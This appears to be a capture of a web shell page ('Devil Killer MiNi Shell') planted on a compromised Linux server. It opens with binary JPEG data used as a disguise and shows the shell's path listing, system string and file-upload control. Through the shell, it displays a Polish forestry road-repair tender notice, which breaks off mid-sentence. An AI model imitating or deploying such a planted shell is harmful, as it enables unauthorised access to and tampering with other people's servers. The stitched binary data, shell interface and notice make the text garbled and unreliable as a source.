JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220621/0021560401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remonty dróg w Nadleśnictwie Krasiczyn </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Krasiczyn zs. w Przemyślu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650017112</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">29 Listopada 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przemyśl</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">krasiczyn@krosno.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://krasiczyn.krosno.lasy.gov.pl/nadlesnictwo</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remonty dróg w Nadleśnictwie Krasiczyn </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-652d63d5-ec8d-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00215604</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00248653/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Remonty dróg w Nadleśnictwie Krasiczyn</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_krasiczyn <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami<br/>w niniejszym postępowaniu odbywa się przy użyciu platformy zakupowej Open Nexus<br/>platformazakupowa.pl/ (dalej: „Platforma”): https://platformazakupowa.pl/pn/lasy_krasiczyn lub przy<br/>użyciu poczty elektronicznej: krasiczyn@krosno.lasy.gov.pl, z zastrzeżeniem, że złożenie oferty,<br/>oświadczenia o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, a także<br/>innych oświadczeń lub dokumentów składanych wraz z ofertą następuje wyłącznie przy użyciu<br/>Platformy. Wymiana informacji oraz przekazywanie dokumentów lub oświadczeń do Wykonawcy może<br/>odbywać się również za pomocą poczty elektronicznej Zamawiającego, email:<br/>maciej.wodka@krosno.lasy.gov.pl, krasiczyn@krosno.lasy.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dotyczące w szczególności logowania, składania ofert, składania wniosków o wyjaśnienie treści SWZ, wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz innych informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji korzystania z Platformy https://platformazakupowa.pl/strona/45-instrukcje, w zakładce „Instrukcje dla Wykonawców” oraz w Regulaminie korzystania z Platformy, dostępnym pod adresem: https://platformazakupowa.pl/strona/1-regulamin<br/>1)<br/>Zamawiający, zgodnie z § 11 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452), niniejszym określa wymagania<br/>techniczne umożliwiające korzystanie z udostępnianej przez Zamawiającego Platformy<br/>https://platformazakupowa.pl/pn/lasy_krasiczyn, tj.:1) stały dostęp do sieci Internet o gwarantowanej<br/>przepustowości nie mniejszej niż 512 kb/s, 2) komputer klasy PC lub MAC o następującej konfiguracji:<br/>pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów<br/>operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, 3) zainstalowana<br/>dowolna<br/>przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0., 4) włączona obsługa<br/>JavaScript, 5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,6)<br/>Platforma działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8,7) oznaczenie czasu odbioru danych przez Platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany według czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar. Limit objętości plików lub spakowanych folderów w zakresie całej oferty, oświadczenia o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, a także innych oświadczeń<br/>lub dokumentów składanych wraz z ofertą wynosi 10 plików lub spakowanych folderów (pliki można<br/>skompresować zgodnie z działem 8 ust. 9) SWZ, przy maksymalnej wielkości pojedynczego pliku 150<br/>MB. Podczas komunikacji wielkość pliku to maksymalnie 500 MB. Do oferty należy dołączyć<br/>oświadczenia o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu oraz inne<br/>oświadczenia lub dokumenty składane wraz z ofertą, a następnie wraz z innymi plikami skompresować<br/>do jednego pliku archiwum (ZIP). Wykonawca składa ofertę, oświadczenia o niepodleganiu<br/>wykluczeniu i spełnianiu warunków udziału w postępowaniu, a także inne oświadczenia lub dokumenty<br/>składane wraz z ofertą na Platformie - za pośrednictwem Formularza do składania oferty lub wniosku<br/>dostępnego na https://platformazakupowa.pl/pn/lasy_krasiczyn, poprzez dołączenie załącznika. Ofertę<br/>należy złożyć w oryginale. Do oferty należy dołączyć wszystkie wymagane w SWZ dokumenty. Po<br/>wypełnieniu Formularza składania oferty lub wniosku i załadowaniu wszystkich wymaganych<br/>załączników należy kliknąć przycisk „Przejdź do podsumowania”. Oferta lub wniosek składana<br/>elektronicznie musi zostać podpisana elektronicznym podpisem kwalifikowanym lub podpisem<br/>zaufanym lub podpisem osobistym. W procesie składania oferty za pośrednictwem platformy<br/>wykonawca powinien złożyć podpis bezpośrednio na dokumencie przesłanym za pośrednictwem<br/>Platformy. Złożenie podpisu na platformie na etapie podsumowania ma charakter nieobowiązkowy,<br/>jednak pozwala zweryfikować ważność podpisu przed złożeniem oferty. Za datę przekazania oferty<br/>przyjmuje się datę jej przekazania w systemie (platformie) w drugim kroku składania oferty poprzez<br/>kliknięcie przycisku “Złóż ofertę” i wyświetlenie się komunikatu, że oferta została zaszyfrowana<br/>(szyfrowanie odbywa się automatycznie) i złożona.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. W związku z rozpoczęciem obowiązywania z dniem 25<br/>maja 2018 r. Rozporządzenia Parlamentu Europejskiego i Rady Unii Europejskiej 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej nazwa<br/>RODO), stosownie do wymogów wynikających z art. 13 ust. 1 i ust. 2 tego aktu prawnego informujemy,<br/>że administratorem Państwa danych osobowych jest Nadleśnictwo Krasiczyn z siedzibą w Przemyślu,<br/>ul. 29 Listopada 12, 37-700 Przemyśl. Przedstawicielem administratora jest: Nadleśniczy –<br/>Przemysław Włodek<br/>2. Z administratorem można skontaktować się: osobiście w siedzibie Nadleśnictwa Krasiczyn<br/>telefonicznie pod numerem (16) 670 66 54, za pomocą poczty elektronicznej e-mail pod adresem:<br/>krasiczyn@krosno.lasy.gov.pl. Administrator nie wyznaczył Inspektora Ochrony Danych Osobowych.<br/>3. Przetwarzanie Państwa danych osobowych jest dokonywane w celu prawidłowej realizacji<br/>obowiązków ustawowych tj. przeprowadzenia postępowania o udzielenie zamówienia publicznego i<br/>zawarcia umowy z wybranym wykonawcą. Dane osobowe są przetwarzane na podstawie prawnej art.<br/>6 ust. 1 lit. b) i lit. c) RODO. Podanie danych jest dobrowolne, ale jest warunkiem wzięcia udziału w<br/>postępowaniu o udzielenie zamówienia publicznego oraz zawarcia umowy.<br/>4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy z dnia 24 października<br/>2019 r. – Prawo zamówień publicznych (tekst jednolity: Dz.U. z 2021 r. poz. 1129, ze zm.), dalej<br/>„ustawa Pzp”. 5. Państwa dane osobowe mogą być przekazywane do organów państwowych (np.<br/>Policja,prokuratura) prowadzących postępowania (np. karne, o wykroczenia). Dane mogą być również<br/>przekazywane kancelarii prawnej prowadzącej obsługę prawną Nadleśnictwa, jak również do jednostek<br/>nadrzędnych Lasów Państwowych w szczególności do RDLP w Krośnie oraz DGLP. Ponadto dane osobowe będą udostępniane łącznie z dokumentacją dotyczącą postępowania o udzielenie<br/>zamówienia publicznego w przypadkach składania wniosków o udostępnienie informacji publicznej.<br/>6. Państwa dane osobowe są przetwarzane ręcznie oraz elektronicznie za pomocą Systemu<br/>Informatycznego Lasów Państwowych. Dane osobowe są i będą przetwarzane przez okres czasu<br/>wyznaczony przepisami o rachunkowości – nie dłużej niż 6 lat licząc od wystawienia ostatniej faktury,<br/>jak również wyznaczony przepisami kodeksu cywilnego o przedawnieniu roszczeń – podstawowy<br/>termin 6 lat od wymagalności roszczenia, jak również przez okres czasu wyznaczony przepisami (w<br/>tym wewnętrznymi) o archiwizacji dokumentów – w zależności od tego, który z tych okresów będzie<br/>najdłuższy.<br/>7. W związku z przetwarzaniem danych osobowych przysługuje Państwu prawo do:<br/>1) żądania od Administratora, na podstawie art. 15 RODO, dostępu do Pani/Pana danych osobowych,<br/>2) żądania od Administratora, na podstawie art. 16 RODO, sprostowania Pani/Pana danych<br/>osobowych.<br/>3) żądania od Administratora, na podstawie art. 18 RODO, ograniczenia przetwarzania Pani/Pana<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Pani/Pan uzna,<br/>że przetwarzanie Pani/Pana danych osobowych narusza przepisy RODO.<br/>8. W związku z przetwarzaniem danych osobowych przysługuje Państwu<br/>prawo do:<br/>1) żądania od Administratora, na podstawie art. 17 ust. 3 lit. b, d lub e RODO, usunięcia Pani/Pana<br/>danych osobowych;<br/>2) prawo do przenoszenia danych osobowych o którym mowa w art. 20 RODO;<br/>3) prawo sprzeciwu, na podstawie art. 21 RODO, wobec przetwarzania danych osobowych , gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Stosownie do wymogów wynikających z przepisu art. 19<br/>ust. 4 ustawy Pzp, Zamawiający informuje, że: 1) W przypadku gdy wniesienie żądania dotyczącego<br/>prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje ograniczenie<br/>przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego<br/>protokołu, od dnia zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia<br/>tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.<br/>(art. 74 ust. 3 ustawy Pzp)<br/>2) Udostępnianie protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o<br/>których mowa w art. 9 ust. 1 rozporządzenia 2016/679, zebranych w toku postępowania o udzielenie<br/>zamówienia. Ograniczenia zasady jawności, o których mowa w ust. 3 i art. 18 ust. 3–6, stosuje się<br/>odpowiednio. (art. 74 ust. 4 ustawy Pzp)<br/>3) W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego,<br/>z uprawnienia, o którym mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, Zamawiający może żądać<br/>od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu<br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia. (art.75 ustawy<br/>Pzp)<br/>4) Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania<br/>lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może<br/>naruszać integralności protokołu postępowania oraz jego załączników. (art. 76 ustawy Pzp)<br/>5) Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia<br/>2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>(art. 19 ust. 3 ustawy Pzp)<br/>6) W przypadku danych osobowych zamieszczonych przez zamawiającego w Biuletynie Zamówień<br/>Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w<br/>drodze żądania skierowanego do zamawiającego. (art. 269 ust. 2 ustawy Pzp).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZG.270.1.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 1645598,93 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 1097065,95 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1: „Remont drogi leśnej „Błotnista” nr inw. 713/242 na odcinku od km 1+577 do km 4+335”, <br/>Zakres prac obejmuje:<br/><br/>a) Roboty przygotowawcze:<br/>- karczowanie krzaków – 0,15 ha<br/>- karczowanie pni - 20,0 szt.<br/><br/>b) Odwodnienie korpusu drogowego:<br/>- oczyszczenie rowów z namułu – 5 516,00 m<br/>- rozebranie przepustów Fi 600 – 30,0 m<br/>- wykonanie części przelotowej przepustu z rur PEHD fi 600 – 42,0 m<br/>- wykonanie części przelotowej przepustu z rur PEHD fi 500 – 78,0 m<br/>- montaż ścianek czołowych dla rur fi 600 – szt. 10<br/>- montaż ścianek czołowych dla rur fi 500 – szt. 18<br/><br/>c) Wykonanie podbudowy:<br/>- profilowanie I zagęszczanie podłoża - 15 532,00 m2<br/>- wykonanie podbudowy z gruntu stabilizowanego spoiwem hydraulicznym o wytrzymałości 4-5 MPa – 8.585,00m2<br/>- wykonanie podbudowy z kruszywa łamanego 31,5/63 gr. 20 cm (warstwa dolna) – 8 585,00 m2<br/>- wykonanie podbudowy z kruszywa łamanego 0/63 (warstwa górna) – 11 197,00 m2<br/><br/>d) Wykonanie nawierzchni z płyt drogowych:<br/>- wykonanie nawierzchni z płyt drogowych – 333,00 m2<br/><br/>Szczegółowy opis przedmiotu zamówienia zawiera wzór kosztorysu ofertowego, który stanowi załącznik <br/>nr 2.1 do SWZ.<br/>Zamawiający wymaga co najmniej 36 miesięcznej<br/>gwarancji i rękojmi na wykonany przedmiot zamówienia. Zgodnie z art. 95 ustawy Pzp<br/>Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy<br/>o pracę osób wykonujących roboty budowlane, związane z realizacją przedmiotu zamówienia: W<br/>odniesieniu do oby zadań częściowych, Zamawiający wymaga zatrudnienia przez wykonawcę<br/>lub podwykonawcę na warunkach umowy o pracę w rozumieniu ustawy Kodeks Pracy<br/>wszystkich osób realizujących przedmiot zamówienia za wyjątkiem osób wykonujących<br/>obowiązki kierownika budowy. Zamawiający nie wymaga, by na podstawie umowy<br/>o pracę zatrudniony był Wykonawca lub podwykonawca(y), będący osobą fizyczną, prowadzącą<br/>działalność gospodarczą, także w formie spółki cywilnej. Wymóg zatrudnienia osób na<br/>podstawie umowy o pracę, w dalszej części niniejszej SWZ oraz w pozostałych dokumentach<br/>dotyczących przedmiotowego zamówienia publicznego jest określany także jako: „Obowiązek<br/>zatrudnienia”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233320-8 - Fundamentowanie dróg</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenie w okresie 3 lat od dnia udzielenia zamówienia<br/>podstawowego, zamówienia polegającego na powtórzeniu podobnych robót budowlanych i zgodnego z<br/>przedmiotem zamówienia podstawowego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp – o<br/>wartości do 50 % szacunkowej wartości zamówienia podstawowego w odniesieniu do obu zadań<br/>częściowych.2. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone w szczególności w<br/>przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót, stanowiących przedmiot<br/>zamówienia na skutek warunków atmosferycznych, wystąpienia robót dodatkowych i zamiennych lub<br/>powierzenia Zamawiającemu nowych zadań gospodarczych lub publicznych.3. Zamówienia, o których<br/>mowa w ust. 1, mogą zostać udzielone po przeprowadzeniu odrębnego postępowania o udzielenie<br/>zamówienia publicznego w trybie zamówienia z wolnej ręki.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający<br/>kierować się będzie następującymi kryteriami: 1) Cena – 60% – 2) Samodzielna realizacja zamówienia<br/>– 40%<br/>2. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Ocena ofert będzie się odbywać<br/>według zasad opisanych w dziale 16 ust. ust. 3. SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Samodzielna realizacja zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje 